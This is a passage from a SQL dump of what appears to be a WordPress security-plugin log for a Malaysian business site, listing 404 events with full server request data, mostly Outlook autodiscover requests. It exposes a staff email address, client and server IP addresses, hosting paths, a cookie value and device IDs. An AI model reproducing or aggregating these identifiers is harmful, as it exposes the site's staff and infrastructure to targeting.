umpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-Xn0dNB4K79x2TJls@xwAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570756511.2653\";s:12:\"REQUEST_TIME\";s:10:\"1570756511\";}}','notice','2019-10-11 01:15:16','2019-10-11 01:15:11',35750064,37546200,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.119'),(27888,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"084D325F-AB7D-4083-A415-5B79B0C7DBAB\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-cASuNlhOpg688@F7eOQAAAZE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"49848\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-cASuNlhOpg688@F7eOQAAAZE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570757633.9227\";s:12:\"REQUEST_TIME\";s:10:\"1570757633\";}}','notice','2019-10-11 01:33:56','2019-10-11 01:33:54',35729384,37532000,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.119'),(27889,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{8202ACA0-8761-46C3-B86F-6FF243C04E56}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ec912d500414cd5d8fd42a64f4fb80e3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=860B8C25-1C0F-4BE4-9ED3-FC0A5B28C542\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-g0q@b3MSbXPcLggr0VAAAAFc\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"50155\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-g0q@b3MSbXPcLggr0VAAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570758867.0196\";s:12:\"REQUEST_TIME\";s:10:\"1570758867\";}}','notice','2019-10-11 01:54:29','2019-10-11 01:54:27',35733280,37537600,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.32.27.119'),(27890,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B09679AE-268D-4B02-B24E-755AC2BE15F3\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-lCEdNB4K79x2TJltIMQAAAIg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"54207\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-lCEdNB4K79x2TJltIMQAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570759944.3494\";s:12:\"REQUEST_TIME\";s:10:\"1570759944\";}}','notice','2019-10-11 02:12:27','2019-10-11 02:12:24',35728952,37524776,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.119'),(27891,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A1197548-0586-418D-A6A2-AA8E305BF2A9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-n1q@b3MSbXPcLggr2XQAAAEw\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"51210\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-n1q@b3MSbXPcLggr2XQAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570760663.0524\";s:12:\"REQUEST_TIME\";s:10:\"1570760663\";}}','notice','2019-10-11 02:24:24','2019-10-11 02:24:23',35338816,37136128,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.119'),(27892,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{C2260C01-5F6D-4A52-876F-F3ACEB33C479}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ec912d500414cd5d8fd42a64f4fb80e3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=860B8C25-1C0F-4BE4-9ED3-FC0A5B28C542\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-u6EdNB4K79x2TJltP7QAAAIg\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"50500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-u6EdNB4K79x2TJltP7QAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570762472.6735\";s:12:\"REQUEST_TIME\";s:10:\"1570762472\";}}','notice','2019-10-11 02:54:36','2019-10-11 02:54:33',35735928,37532584,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.32.27.119'),(27893,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9A3E0EAC-B95E-4D4E-9252-8BE42CDE2B14\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-v70dNB4K79x2TJltQeQAAAJU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"110.159.79.126\";s:11:\"REMOTE_PORT\";s:4:\"1391\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-v70dNB4K79x2TJltQeQAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570762735.6553\";s:12:\"REQUEST_TIME\";s:10:\"1570762735\";}}','notice','2019-10-11 02:58:57','2019-10-11 02:58:56',35339280,37138032,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'110.159.79.126'),(27894,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{6E166824-6642-4DE0-BCDA-634AC426C549}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ec912d500414cd5d8fd42a64f4fb80e3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=860B8C25-1C0F-4BE4-9ED3-FC0A5B28C542\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-8-wKNH2yIeM@cFqwlzgAAAAc\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"50836\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-8-wKNH2yIeM@cFqwlzgAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570766079.2861\";s:12:\"REQUEST_TIME\";s:10:\"1570766079\";}}','notice','2019-10-11 03:54:42','2019-10-11 03:54:39',35736776,37532296,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.32.27.119'),(27895,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"//cert.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"346\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:31:\"http://bintara.com.my//cert.cer\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 